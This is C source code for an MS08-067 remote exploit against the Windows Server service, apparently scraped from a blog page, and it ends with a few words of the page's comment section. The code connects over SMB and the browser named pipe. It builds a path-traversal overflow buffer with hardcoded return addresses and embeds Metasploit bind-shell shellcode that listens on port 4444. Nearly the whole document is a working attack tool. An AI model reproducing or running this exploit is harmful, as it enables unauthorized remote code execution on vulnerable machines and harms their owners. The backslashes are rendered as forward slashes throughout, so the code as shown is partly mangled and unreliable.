#include <winsock2.h> #include <windows.h> #include <stdio.h> #include <io.h> #include <fcntl.h> #include <memory.h> #include <wchar.h> #include "srvsvc.h" #include "srvsvc_c.c" #include "mem.h" #pragma comment(lib,"ws2_32") #pragma comment(lib,"mpr") #pragma comment(lib,"rpcrt4.lib") #pragma comment(lib,"MSVCRT.LIB") DWORD dwRetAddr = 0x7ffa0eb8; DWORD dwJmpAddr = 0x7ffa0eb7; /* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char sc[] = "/x83/xEC/x70" // sub esp, 0x70 "/x29/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xad" "/x07/xe6/x4a/x83/xeb/xfc/xe2/xf4/x51/x6d/x0d/x07/x45/xfe/x19/xb5" "/x52/x67/x6d/x26/x89/x23/x6d/x0f/x91/x8c/x9a/x4f/xd5/x06/x09/xc1" "/xe2/x1f/x6d/x15/x8d/x06/x0d/x03/x26/x33/x6d/x4b/x43/x36/x26/xd3" "/x01/x83/x26/x3e/xaa/xc6/x2c/x47/xac/xc5/x0d/xbe/x96/x53/xc2/x62" "/xd8/xe2/x6d/x15/x89/x06/x0d/x2c/x26/x0b/xad/xc1/xf2/x1b/xe7/xa1" "/xae/x2b/x6d/xc3/xc1/x23/xfa/x2b/x6e/x36/x3d/x2e/x26/x44/xd6/xc1" "/xed/x0b/x6d/x3a/xb1/xaa/x6d/x0a/xa5/x59/x8e/xc4/xe3/x09/x0a/x1a" "/x52/xd1/x80/x19/xcb/x6f/xd5/x78/xc5/x70/x95/x78/xf2/x53/x19/x9a" "/xc5/xcc/x0b/xb6/x96/x57/x19/x9c/xf2/x8e/x03/x2c/x2c/xea/xee/x48" "/xf8/x6d/xe4/xb5/x7d/x6f/x3f/x43/x58/xaa/xb1/xb5/x7b/x54/xb5/x19" "/xfe/x54/xa5/x19/xee/x54/x19/x9a/xcb/x6f/xf7/x16/xcb/x54/x6f/xab" "/x38/x6f/x42/x50/xdd/xc0/xb1/xb5/x7b/x6d/xf6/x1b/xf8/xf8/x36/x22" "/x09/xaa/xc8/xa3/xfa/xf8/x30/x19/xf8/xf8/x36/x22/x48/x4e/x60/x03" "/xfa/xf8/x30/x1a/xf9/x53/xb3/xb5/x7d/x94/x8e/xad/xd4/xc1/x9f/x1d" "/x52/xd1/xb3/xb5/x7d/x61/x8c/x2e/xcb/x6f/x85/x27/x24/xe2/x8c/x1a" "/xf4/x2e/x2a/xc3/x4a/x6d/xa2/xc3/x4f/x36/x26/xb9/x07/xf9/xa4/x67" "/x53/x45/xca/xd9/x20/x7d/xde/xe1/x06/xac/x8e/x38/x53/xb4/xf0/xb5" "/xd8/x43/x19/x9c/xf6/x50/xb4/x1b/xfc/x56/x8c/x4b/xfc/x56/xb3/x1b" "/x52/xd7/x8e/xe7/x74/x02/x28/x19/x52/xd1/x8c/xb5/x52/x30/x19/x9a" "/x26/x50/x1a/xc9/x69/x63/x19/x9c/xff/xf8/x36/x22/x42/xc9/x06/x2a" "/xfe/xf8/x30/xb5/x7d/x07/xe6/x4a"; int MakeBuff(char *Buff,int BufLen); void Usage(char *ProgName); int WaitExit(); #define CN 0 #define TW 1 void main(int argc, char *argv[]) { NETRESOURCE lpNetResource; char Username[256] = {0}; char Password[256] = {0}; DWORD Ret = 0; RPC_STATUS status; unsigned char * pszUuid = NULL; unsigned char * pszProtocolSequence = "ncacn_np"; unsigned char * pszNetworkAddress = ""; unsigned char pszEndpoint[100] = "//pipe//browser"; unsigned char * pszOptions = NULL; unsigned char * pszStringBinding = NULL; char Server[256] = {0}; char RemoteName[256] = {0}; char Buff[0x700]; char Buff2[1000] = {0}; char *pBuff2 = (char *)&Buff2; char Buff3[100] = {0}; int BufLen = 0; // int i; int ForceAttack = 0; int AntiDEP = 0; int nLanguage = 0; DWORD dwID = 0; if(argc != 2) { Usage(argv[0]); return; } strcpy(Server,argv[1]); sprintf(RemoteName,"%s//IPC$",Server); pszNetworkAddress = Server; if(strlen(Server) == 0) { Usage(argv[0]); return; } printf("/nMS08-067 Exploit for CN by EMM@ph4nt0m.org/n/n"); lpNetResource.dwScope=RESOURCE_CONNECTED; lpNetResource.dwType =RESOURCETYPE_DISK; lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE; lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE; lpNetResource.lpLocalName=NULL; lpNetResource.lpRemoteName = RemoteName; lpNetResource.lpComment=NULL; lpNetResource.lpProvider=NULL; Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE); if(Ret != NO_ERROR) { printf("Make SMB Connection error:%d/n",GetLastError()); return; } printf("SMB Connect OK!/n"); status = RpcStringBindingCompose(pszUuid, pszProtocolSequence, pszNetworkAddress, pszEndpoint, pszOptions, &pszStringBinding); if(status != RPC_S_OK) { return; } status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle); if(status != RPC_S_OK) { return; } RpcTryExcept { func23(L"ph4nt0m",(wchar_t *)"/x53/x00/x56/x89/x56/x89/x56/x89/x56/x89",(wchar_t *)"/x4D/x00/x56/x89/x56/x89",4,0); memset(Buff,0,sizeof(Buff)); BufLen = MakeBuff(Buff,sizeof(Buff)); CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID); (DWORD)*(DWORD *)Buff3 = 1; func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1); } RpcExcept ( 1 ) { status = RpcExceptionCode(); if(status == 1726) { } else { printf("RpcExceptionCode() = %u/r/n", status ); return; } } RpcEndExcept //*/ printf("Maybe Patched!/n"); RpcStringFree( &pszStringBinding ); RpcBindingFree( &srvsvc__MIDL_AutoBindHandle ); return; } #define JMPPOINT "B041" int MakeBuff(char *Buff, int BufLen) { int len = 0; char tmp[5] = {0}; int i; for(i = 0; i < BufLen/4; i++) { memset(tmp,0,4); sprintf(tmp,"B%03d",i); //* if(memcmp(tmp,JMPPOINT,4) == 0) { break; } //*/ memcpy(Buff + len,tmp,4); len += 4; } memcpy(Buff,L".a//..//..//NN",13*2); for(i = 0; i < 6; i++) { memcpy(Buff + len,&dwRetAddr,4); len += 4; } memcpy(Buff + len,&dwJmpAddr,4); len += 4; memset(Buff + len,0x48,0x4); len += 4; memcpy(Buff + len,sc,sizeof(sc) - 1); len += sizeof(sc) - 1; memcpy(Buff + len,"EMM!",4); len += 4; memset(Buff + 0x206 * 2,0,2); return len; } void Usage(char *ProgName) { printf("/n MS08-067 Exploit for CN by EMM@ph4nt0m.org/n/n %s <Server>/n/n",ProgName); return; } int WaitExit() { Sleep(1000 * 5); printf("Send Payload Over!/n"); ExitProcess(0); return 0; }
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
